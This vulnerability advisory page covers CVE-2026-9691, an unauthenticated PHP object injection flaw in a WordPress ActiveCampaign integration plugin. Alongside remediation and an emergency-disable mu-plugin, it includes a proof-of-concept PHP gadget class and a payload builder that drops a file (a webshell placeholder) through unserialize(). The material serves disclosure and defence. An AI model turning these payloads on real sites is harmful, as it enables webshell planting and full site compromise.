
Integration for ActiveCampaign CVE-2026-9691

EUVD-2026-36908 · CRITICAL
Deserialization of Untrusted Data (CWE-502)
2026-06-15 · Patchstack · GHSA-gpvc-87r4-hfmw
CVSS 3.1 base score 9.8 (Vendor: Patchstack)

Severity by source

Vendor (Patchstack), primary: 9.8 CRITICAL
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

vuln.today AI: 9.8 CRITICAL

An unauthenticated, network-reachable WordPress endpoint deserializes attacker input, enabling RCE via POP chains with full confidentiality, integrity and availability impact, matching AV:N/AC:L/PR:N/UI:N.

CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (Patchstack).

CVSS Vector (Vendor: Patchstack)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Lifecycle Timeline

1. Analysis Generated: Jun 15, 2026, 21:21 (vuln.today)

Description (CVE.org)

Unauthenticated PHP Object Injection in Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms <= 1.1.1 versions.

Analysis (AI)

Unauthenticated PHP Object Injection in the WordPress plugin 'Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms' (versions 1.1.1 and earlier) allows remote attackers to inject crafted serialized objects that are deserialized by the plugin, enabling abuse of POP gadget chains for code execution, file operations, or data tampering. The flaw scores CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) and impacts any WordPress site running the affected CRM Perks integration plugin. …


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata:

1. Access: identify a WordPress site running the vulnerable plugin.
2. Delivery: send an HTTP request carrying a serialized PHP object in a parameter the plugin reads.
3. Exploit: the plugin passes that parameter to unserialize(), instantiating the attacker-chosen object.
4. Execution: a POP gadget chain runs through the object's magic methods (__wakeup, __destruct, __toString).
5. Persist: write a webshell or otherwise run arbitrary PHP to establish persistence on the site.
6. Impact: full compromise of the site, with confidentiality, integrity and availability all rated High.

Vulnerability Assessment (AI)

Exploitation: The only preconditions are that the affected CRM Perks plugin 'Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms', at version 1.1.1 or earlier, is installed and active on a reachable WordPress site, and that the vulnerable deserialization entry point (typically a plugin AJAX action, REST route, or form-handling hook) accepts unauthenticated HTTP requests, consistent with CVSS PR:N and UI:N. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment: Risk is high on the CVSS vector alone: network attack vector, low complexity, no privileges required, no user interaction, and high confidentiality, integrity and availability impact (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H). …
Exploit Scenario: An unauthenticated attacker sends a crafted HTTP POST to a public-facing endpoint exposed by the plugin, embedding a serialized PHP object string in a parameter that the plugin passes to unserialize(). When PHP instantiates the object, its magic methods (__wakeup, __destruct, __toString) fire and trigger a POP gadget chain reachable in WordPress core or another loaded plugin, letting the attacker write a webshell or execute arbitrary code as the web server user. The gadgets need not live in the vulnerable plugin itself, so what an attacker can do depends on every other piece of code loaded on the site; the fix is to stop deserializing untrusted input, not to hunt gadgets. …
Remediation: A patch is available per the vendor advisory; upgrade the plugin to a version later than 1.1.1 as published by CRM Perks on the WordPress.org plugin repository. The Patchstack advisory at https://patchstack.com/database/wordpress/plugin/cf7-active-campaign/vulnerability/wordpress-integration-for-activecampaign-and-contact-form-7-wpforms-elementor-ninja-forms-plugin-1-1-1-php-object-injection-vulnerability is the reference; an exact fixed version is not independently confirmed in the supplied data. …
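The pattern described in the analysis, exploit scenario and remediation above, as an added example that is neither the plugin's code nor Patchstack's: a minimal gadget class, a handler that passes request input straight to unserialize(), a payload builder of the kind an attacker would use, and a hardened handler that refuses to instantiate classes from untrusted input. The class name LogWriter, the handler and builder names, the AJAX action name acf7_submit and the demo file path are assumptions for illustration; the page does not identify the real entry point or the gadgets available on a given site.

```php
<?php
// Added example, not the plugin's code. LogWriter, the handler names, the AJAX
// action 'acf7_submit' and the demo path are assumptions for illustration.

// A gadget: any class loaded at unserialize() time whose magic method does
// something useful to an attacker. Here __destruct writes a file, so one
// injected object is already a webshell dropper. Gadgets like this can sit in
// WordPress core or in any other active plugin, not only in the vulnerable one.
class LogWriter {
    public $path;
    public $content;
    public function __destruct() {
        file_put_contents($this->path, $this->content);
    }
}

// The vulnerable pattern: untrusted input goes straight to unserialize(), so
// PHP instantiates whatever class the attacker names and its magic methods run.
function vulnerable_handler(string $raw): void {
    $data = unserialize($raw);
    // Even if $data is never used, LogWriter::__destruct fires when it goes
    // out of scope at the end of this function.
}

// Hardened replacement: never instantiate a class from untrusted input.
// With allowed_classes => false every O:...:{} becomes __PHP_Incomplete_Class,
// which has no destructor, and anything that is not a plain array is rejected.
function hardened_handler(string $raw): ?array {
    $data = @unserialize($raw, ['allowed_classes' => false]);
    return is_array($data) ? $data : null;
}

// What the attacker sends: a serialized LogWriter with chosen path and content.
// String lengths are computed, so the payload is well-formed for any inputs.
function build_payload(string $path, string $content): string {
    return sprintf(
        'O:9:"LogWriter":2:{s:4:"path";s:%d:"%s";s:7:"content";s:%d:"%s";}',
        strlen($path), $path, strlen($content), $content
    );
}

// How such a handler is typically exposed by a plugin (assumed action name):
// wp_ajax_nopriv_* hooks serve unauthenticated visitors through admin-ajax.php.
if (function_exists('add_action')) {
    add_action('wp_ajax_nopriv_acf7_submit', function () {
        hardened_handler((string) ($_POST['data'] ?? ''));
        wp_die();
    });
}

// Stand-alone demo (php this_file.php): the vulnerable path drops a file in the
// temp directory, the hardened path returns null and touches nothing.
if (PHP_SAPI === 'cli' && realpath($argv[0] ?? '') === __FILE__) {
    $target  = sys_get_temp_dir() . '/poi-demo.txt';
    $payload = build_payload($target, "<?php /* webshell placeholder */ ?>");
    @unlink($target);

    vulnerable_handler($payload);
    echo 'vulnerable handler: file written = ', var_export(file_exists($target), true), "\n";
    @unlink($target);

    $result = hardened_handler($payload);
    echo 'hardened handler: result = ', var_export($result, true),
         ', file written = ', var_export(file_exists($target), true), "\n";
}
```

The allowed_classes option is the smallest change that neutralises object injection, but it still lets an attacker feed arbitrary nested structures to the parser; where the data format is under the plugin's control, a format with no class semantics such as JSON is the better fix. On the detection side, a request body aimed at the plugin's endpoint that contains a serialized object header (the `O:<length>:"<class>"` prefix the builder above emits) is a strong signal worth alerting on.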

Recommended Action (AI)

24 hours: Identify every WordPress instance running the 'Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms' plugin at version 1.1.1 or earlier, and disable the plugin immediately wherever it is not business-critical. …
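A compensating control for the 24-hour action above, as an added example that is neither CRM Perks' nor vuln.today's code: a must-use plugin that locates the affected plugin by the name quoted on this page and deactivates it when its version is 1.1.1 or lower, so a fleet can be neutralised before the upgrade lands. It assumes the plugin header's Name starts with 'Integration for ActiveCampaign' and that PHP's error_log is collected; the main plugin file name is not given on the page, so the match is by name rather than by path. Where shell access exists, `wp plugin list` and `wp plugin deactivate` achieve the same with less machinery.

```php
<?php
/**
 * Plugin Name: Emergency disable for CVE-2026-9691 (added example)
 *
 * Drop into wp-content/mu-plugins/. Added example, not vendor code. Assumption:
 * the affected plugin's header Name begins with 'Integration for ActiveCampaign'.
 */

const CVE_2026_9691_MAX_VULNERABLE = '1.1.1';

// Pure decision helper, kept free of WordPress calls so it can be exercised
// from the command line: true when the name matches and the version is
// within the affected range (1.1.1 and earlier, per the advisory).
function cve_2026_9691_is_affected(string $name, string $version): bool {
    return stripos($name, 'Integration for ActiveCampaign') === 0
        && version_compare($version, CVE_2026_9691_MAX_VULNERABLE, '<=');
}

if (function_exists('add_action')) {
    add_action('admin_init', function () {
        // get_plugins(), is_plugin_active() and deactivate_plugins() live in
        // the admin plugin helpers, which are not loaded on every request.
        require_once ABSPATH . 'wp-admin/includes/plugin.php';

        foreach (get_plugins() as $file => $meta) {
            if (!cve_2026_9691_is_affected($meta['Name'], $meta['Version'])) {
                continue;
            }
            if (is_plugin_active($file)) {
                deactivate_plugins($file);
                error_log(sprintf(
                    'CVE-2026-9691: deactivated %s (version %s) on %s',
                    $file, $meta['Version'], home_url()
                ));
            }
        }
    });
}

// Stand-alone check of the decision logic (php this_file.php).
if (PHP_SAPI === 'cli' && realpath($argv[0] ?? '') === __FILE__) {
    $name = 'Integration for ActiveCampaign and Contact Form 7, WPForms, Elementor, Ninja Forms';
    foreach (['1.0.9', '1.1.1', '1.1.2'] as $v) {
        echo $v, ' affected: ', var_export(cve_2026_9691_is_affected($name, $v), true), "\n";
    }
}
```

Remove the mu-plugin once every site has been upgraded past 1.1.1, otherwise it will keep the patched plugin inactive only if the vendor's fixed release still reports a version at or below 1.1.1, which is unlikely but not confirmed in the supplied data.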


CVE-2026-9691 vulnerability details – vuln.today
